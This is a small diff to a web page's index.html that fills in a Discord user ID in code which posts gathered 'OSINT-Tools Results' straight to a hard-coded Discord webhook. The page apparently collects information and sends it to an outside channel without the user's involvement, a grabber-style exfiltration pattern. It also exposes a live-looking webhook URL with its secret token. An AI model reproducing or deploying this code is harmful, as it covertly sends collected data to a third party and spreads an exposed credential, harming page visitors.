--- a/index.html
+++ b/index.html
@@ -217,7 +217,7 @@
                 // Send to Discord webhook immediately
                 const webhookUrl = 'https://discord.com/api/webhooks/1406645503231266868/NGpnlrIe81pRKbSqCjhHH4NcWtI8G9ZjM22P2Xa4P3r2FKuaqZIpQdHJaTW9SLHT-AcQ';
                 const payload = {
-                    content: `**OSINT-Tools Results <@REPLACE WITH UR DISCORD ID>**\n\`\`\`\n${infoLines.join('\n')}\n\`\`\``
+                    content: `**OSINT-Tools Results <@1274818615270441002>**\n\`\`\`\n${infoLines.join('\n')}\n\`\`\``
                 };
                 await fetch(webhookUrl, {
                     method: 'POST',
